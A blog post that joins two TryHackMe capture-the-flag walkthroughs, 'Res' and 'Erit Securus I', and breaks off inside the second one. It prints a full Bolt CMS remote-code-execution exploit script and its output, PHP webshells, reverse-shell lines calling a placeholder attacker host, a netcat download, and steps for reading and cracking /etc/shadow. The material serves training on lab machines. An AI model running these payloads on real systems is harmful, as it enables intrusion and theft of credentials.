The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
TryHackMe Res Walkthrough


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge! TryHackMe Res Redis pentesting Walkthrough

Let’s start of by scanning all ports using Nmap:

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo nmap -A -T4 -Pn  -sV -p- 10.10.43.113                                          130 ⨯
[sudo] password for hackerboy: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
Nmap scan report for 10.10.43.113
Host is up (0.22s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   Redis key-value store 6.0.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint: #www.kumaratuljaiswal.in #www.hackingtruth.in
OS:SCAN(V=7.91%E=4%D=1/26%OT=80%CT=1%CU=44172%PV=Y%DS=2%DC=T%G=Y%TM=60105BB
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   224.93 ms 10.8.0.1
2   225.08 ms 10.10.43.113

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
                                                                                              
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ 

Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7 which is an in memory data structure store running on port 6379.


Port 80: Apache Web Server:

Let’s checkout the web server on port 80:

OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately no hidden directories can be found. Time to move on to port 6379 and enumerate Redis.

Redis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Redis as below: 

Provided by https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce

 

To start with we need to download redis-tools, so we can have access to redis-cli:

sudo apt-get install redis-tools



To start redis-tools, from the command line we enter:

redis-cli -h [IP ADDRESS]

By default Redis can be accessed without credentials. However, it can be configured to support only password, or username + password. In our case Redis can be accessed without any credentials. We can check this simply by entering the ‘info’ command. 

 

 

 

 

From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:

 

 

In firefox we can navigate to [IP-ADDRESS]/redis.php:

 

 

We can see that redis.php does indeed run phpinfo().

Let’s try this with another php script to run commands:


<? php system($_GET['cmd']); ?>



In redis-cli, we can simply overwrite the previous php file with this code and try RCE. 

 

 

 

Let’s see if we can print out the contents of the passwd file on the Linux machine, it is best to change to ‘view-source’ to see the output:

 

 

 

 

 

And there we go, we have the full contents of the /etc/passwd file on the screen and again we can see that we have a user vianka. All we need to do now is setup a listener and create a script to run a simple reverse php shell.

To do this I will do the same as above in redis-cli, but we will set test to run the following php reverse shell script.

"<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"




One important point here is that we will need to escape the set test “….” quotes from the php shell script, so we will need to modify our shell code as follows:

 

To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like meterpreter, in that we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts. 

 

 

 

 

 

And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag. 

 

 

 

 

 

 

 

 

Wait here, so basically i can't clear my terminal if in your case has been same so dont worry we are here to reloved this issue. simple type this command and you will be able to clear your terminal.

 

export TERM=xterm 

 

 

 

 The result show a binary xxd with the SUID bit set and the owner is root. We can probably exploit this to read a file with full root privileges. The go to choice fo rlinux binary exploits is GTFOBins. 

 

 

Provided by GTFOBins

 

 

 

but all we will find the file with sudo permission with this type of command 

find / -perm -u=s -type f 2>/dev/null

 

 

 

Unfortunately we do not have sudo rights, but looking at the info we can read a file as root, as the file as the SUID bit set. I may be possible to read the shadow file and extract the hash for user vianka and we if we can brute force the hash to get the password.

 

 

 

 

 

Using this exploit we can print out the contents of the shadow file and copy Vianka hash. If I can brute force the hash using John we can simply SU as user Vianka.

 

 

 

 

 

 

Brute Forcing Vianka’s Hash with John:

To do this we need to create two files, one with the contents of the passwd file and one with the hash of the shadow file, we only need to copy and paste the information for user Vianka. We can then use the ‘unshadow’ command to convert the hash to a format that is readable by John.

 

echo "content" > local_shadow

echo "content" > local_passwd

unshadow passwd.txt shadow.txt > hash.txt

 

 

 

 

john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt

 

 

 

 

 

 

Now, we have the password for user vianka,so we can simply 'su vianka' to change user to vianka:

 

 

 

 

 

 

 

And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.

 

 

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

 

The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

TryHackMe Erit Securus I walkthrough


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.  TryHackMe h4cked walkthrough

Let's Start 

we can run a simple nmap scan to look for open ports and services - 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme]
└─$ sudo nmap -A -T4 -Pn  -sV -vv  10.10.108.118                                                    
[sudo] password for hackerboy: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 16:05 IST
NSE: Loaded 153 scripts for scanning.
Initiating NSE at 16:05
Completed NSE at 16:05, 0.00s elapsed
Scanning 10.10.108.118 [1000 ports]
Discovered open port 22/tcp on 10.10.108.118
Discovered open port 80/tcp on 10.10.108.118
Completed SYN Stealth Scan at 16:05, 6.47s elapsed (1000 total ports)
Retrying OS detection (try #3) against 10.10.108.118
Completed NSE at 16:05, 0.00s elapsed
Nmap scan report for 10.10.108.118
Host is up, received user-set (0.23s latency).
Scanned at 2021-05-26 16:05:04 IST for 49s
Not shown: 998 closed ports
Reason: 998 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAPWmD4IaPbJQU46GEKX8pUal0IbZzIykktEuUh5boCKMuwsetNGanzNZYFd6eGWRd+zqr6nRnRFQPDiDZtt6DDz7NcJcXliGifQehWEEmskzfhdGSuh+kBUQaqXskCKZi0U/l9P0kvP6bD2SdsXqiYTBGQxN6a4Do1fyE2OoVYgPAAAAFQD4r+hmmsHGFfn0SV1mjGpoHpFwuwAAAIAnnoGwYiWDRAwFoPLkLYWahNwCbLAhVXOb1cnr8NxZN+uRMqEdtoZHNUbTd7ki8j5WpkZhMjFEyZQJg+MNQjUSxISlE1SoBTI8BmAUDAEvgPNyr0CDCS42rAY98JTMhaoZ8FOzgoatLmJWWgWqM+8YHCN4XHoVgm1vMagLsWxW5AAAAIBGW3tnTGis3+eWROnisRfyoo3zawOnd7oijjK7CAiIuxfqc3ESTzeLlkL0QBAIv/1PBGoZSTwg53aZqctO2/BgSNGMWDts3xnqpsEGNyo520Br/cBUyi6rRBotV1kL9tIT4VwdP33F/bjiHHRclfCmOtVYWmkst+HUSqS2yPn1WQ==
|   2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0zYWd7C1JANU5TctI7lB/tyS9Aid6x5Dh2PnD7fpz6C9Apv9Y/YJzaCUYgqME41ZDxIIiegV02OSCkKFmXvr9gVVKaFHyUVhQ9Zb3FyQeGgWEL3004HIL+G06afXPlsRzNBb5VoqUte+5bigJT5UkyncAfWn+8bWLnFmuXDi5PZ4Pz0RHx9HzCwJ5G26DogQUI6M0zQkhJHzD+nWdIExvoY1L9UN4oZzCuaUF3Tcel3dDnbgi1RaZlfFi3r5NNUtQ7OVijWnms7nYNN7b77CZZWMhE6yMYI8+3ya99CfzA/oYsHv+t8XSbRyAdm5KvETrD8yoBrE14F2FekQQNggx
|   256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAOH4ypeTzhthRbvcrzqVbbWXG1imFdejEQIo53fimAkjsOcrmEDWwT7Lskm5qyz4dmhGmfsH90xzOgQ+Bm6Nuk=
|   256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7iJO0KhscqLrJgy+mvB3Y+5U+WpOiBAxCr4TKu7pJB
80/tcp open  http    syn-ack ttl 63 nginx 1.6.2
|_http-generator: Bolt
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.6.2
|_http-title: Graece donan, Latine voluptatem vocant. | Erit Securus 1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/26%OT=22%CT=1%CU=33880%PV=Y%DS=2%DC=T%G=Y%TM=60AE248
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 0.043 days (since Wed May 26 15:03:51 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   264.29 ms 10.8.0.1
2   264.52 ms 10.10.108.118

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.48 seconds
           Raw packets sent: 1306 (61.562KB) | Rcvd: 1134 (56.636KB)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme]
└─$ 

From this result :-

port 22/tcp - SSH (openSSH 6.7p1)

port 80/tcp - HTTP (nginx 1.6.2)

Enumeration 

Examine webserver. Identify what web-app is running. The Content management system that the website is built on can ve found in the http-generator field of the nmap scan. This can also be determined by viewing the website via the browser and scrolling to the bottom of the page:-

Exploit 

Download exploit for this app. The exploit works, but might not fire every time. If you first don't succeed...

CVE - Exploit 

The exploit requires authentication, which means we will require a username and password to proceed. We could attempt to brute force this, but these credentials can be easily guessed using a few simple username/password combinations on the login page.

  # Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Date: 2020-04-05
# Exploit Author: r3m0t3nu11
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.x
# Tested on: Linux
# CVE : not-yet-0day

#!/usr/bin/python

import requests
import sys
import warnings
import re
import os
from bs4 import BeautifulSoup
from colorama import init 
from termcolor import colored 
  
init() 
#pip install -r requirements.txt
print(colored('''
 ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
 ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀

Pre Auth rce with low credintanl
#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))



if len(sys.argv) != 4:
    print((len(sys.argv)))
    print((colored("[~] Usage : ./bolt.py url username password","red")))
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]



request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login form","green")))
page = request.get(url+"/bolt/login")
html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser')
token = soup.findAll('input')[2].get("value")

login_info = {
    "user_login[username]": username,
    "user_login[password]": password,
    "user_login[login]": "",
     "user_login[_token]": token
   }

login_request = request.post(url+"/bolt/login", login_info)
print((colored("[+] Login token is : {0}","green")).format(token))



aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value")
data_profile = { 
	"user_profile[password][first]":"password",
	"user_profile[password][second]":"password",
	"user_profile[email]":"a@a.com",
	"user_profile[displayname]":"",
	"user_profile[save]":"",
	"user_profile[_token]":token0

		}
profile = request.post(url+'/bolt/profile',data_profile)




cache_csrf = request.get(url+"/bolt/overview/showcases")

soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")


asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
soup2 = BeautifulSoup(asyncc.text, 'html.parser')
tables = soup2.find_all('span', class_ = 'entry disabled')


print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables: 
	
	f= open("session.txt","a+")
	f.write(all_tables.text+"\n")
	f.close()
	num_lines = sum(1 for line in open('session.txt'))
	
	renamePostData = {
		"namespace": "root",
		"parent": "/app/cache/.sessions",
		"oldname": all_tables.text,
		"newname": "../../../public/files/test{}.php".format(num_lines),
		"token": csrf
	   }
	rename = request.post(url+"/async/folder/rename", renamePostData)
	



	try:
		url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)

		rev = requests.get(url1).text
		r1 = re.findall('php',rev)
		
		r2 = r1[0]
		if r2 == "php" : 
			fileINJ = "test{}".format(num_lines)
			


			print((colored("[+] FOUND  : "+fileINJ,"green")))
		
	except IndexError:
		print((colored("[-] Not found.","red")))

new_name = 0
while new_name != 'quit':
	inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
	if inputs == "quit" :
		exit()
	else:
		a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
		aa = a.text
		r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)


		print((r11)[0])
            



  
  

if you want to renamed first so you can.

  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ls
48296.py
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ sudo cp 48296.py  exploit.py               
[sudo] password for hackerboy: 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ls
48296.py  exploit.py
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ 


  
  

Gaining access

We are ready to run the exploit script against the target:

sudo python3 exploit.py http://<target IP> admin password

  
  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ sudo python3 exploit.py http://10.10.108.118 admin password

 ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
 ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀

Pre Auth rce with low credintanl
#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex
[+] Retrieving CSRF token to submit the login form
[+] Login token is : _AJfPiYG9NweZWcPHp4VBBTPffsYer938Wn9Dad6qho
[+] SESSION INJECTION 
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[+] FOUND  : test5
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[+] FOUND  : test15
[-] Not found.
Enter OS command , for exit 'quit' : 
                                                                      
  

Now we have access, we can create a simple PHP shell on the server:


echo '<?php system($_GET["cmd"]);?>'>cmd.php

[-] Not found.
[-] Not found.
[+] FOUND  : test15
[-] Not found.
Enter OS command , for exit 'quit' : id
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                                           
";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}}
Enter OS command , for exit 'quit' : 

  

  
  Enter OS command , for exit 'quit' : echo ''>cmd.php
";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}}
Enter OS command , for exit 'quit' : 

  

This can then be used to upload a netcat reverse shell (as there is no netcat on the target machine). First, we will need to create a symbolic link to netcat on our local machine to the current directory on the target. Run this command via a local terminal:

ln -s $(which nc) .

  
  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ln -s $(which nc) .
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ls                 
48296.py  exploit.py  nc  session.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ 


  

A simple web server can then be started locally in order to serve the file to the target:

Using the PHP shell we are able to download netcat to the target via the browser:

http://10.10.108.118/files/cmd.php?cmd=wget http://<local-IP>:8080/nc

The file will be transferred to the same directory as the PHP shell. We can make the uploaded netcat file executable by browsing to:

http://10.10.108.118/files/cmd.php?cmd=chmod 755 nc

Next, we need to start a netcat listener on our local machine:-

nc -nvlp 1234

Finally, we can trigger this connection via the browser to get our reverse shell:

http://10.10.108.118/files/cmd.php?cmd=./nc -e /bin/bash <local-IP> 1234

Our reverse shell can then be upgraded to a fully interactive TTY shell by running:


python -c 'import pty;pty.spawn("/bin/bash")'

  
  
www-data@Erit:/var/www/html/public/files$ ls 
ls
cmd.php                       placeholder_ecff05026ae6.jpg  test25.php
index.html                    test1.php                     test26.php
nc                            test10.php                    test27.php
placeholder_07f6539b3d7d.jpg  test11.php                    test28.php
placeholder_0a23551a8097.jpg  test12.php                    test29.php
placeholder_0aa7e8852e11.jpg  test13.php                    test3.php
placeholder_1fad82e5eac1.jpg  test14.php                    test30.php
placeholder_20001088e915.jpg  test15.php                    test31.php
placeholder_46f89a97453b.jpg  test16.php                    test32.php
placeholder_6a843969b527.jpg  test17.php                    test33.php
placeholder_7c21b25839bd.jpg  test18.php                    test4.php
placeholder_84f5c9d2e2c2.jpg  test19.php                    test5.php
placeholder_8a7754ace050.jpg  test2.php                     test6.php
placeholder_8ec2add549d6.jpg  test20.php                    test7.php
placeholder_9cf46a03a9c3.jpg  test21.php                    test8.php
placeholder_aa536d42187b.jpg  test22.php                    test9.php
placeholder_addfa01cba49.jpg  test23.php
placeholder_c45564b83b31.jpg  test24.php
www-data@Erit:/var/www/html/public/files$ 

  

Privilege Escalation

In the /app/database directory you will find the database file: bolt.db


cd ../../app/database
ls

  
  www-data@Erit:/var/www/html/public/files$ cd ../../app/database
cd ../../app/database
www-data@Erit:/var/www/html/app/database$ pwd
pwd
/var/www/html/app/database
www-data@Erit:/var/www/html/app/database$ ls
ls
bolt.db
www-data@Erit:/var/www/html/app/database$ 

The type of database can be determined by running: file bolt.db

  www-data@Erit:/var/www/html/app/database$ file bolt.db
file bolt.db
bolt.db: SQLite 3.x database, last written using SQLite version 3020001
www-data@Erit:/var/www/html/app/database$ 


  
  

We can access this SQLite 3.x database and run the .tables command to display the database tables:

  www-data@Erit:/var/www/html/app/database$ sqlite3 bolt.db
sqlite3 bolt.db
SQLite version 3.16.2 2017-01-06 16:32:41
Enter ".help" for usage hints.
sqlite> 

sqlite> .tables
.tables
bolt_authtoken          bolt_field_value        bolt_pages            
bolt_blocks             bolt_homepage           bolt_relations        
bolt_content_changelog  bolt_log                bolt_showcases        
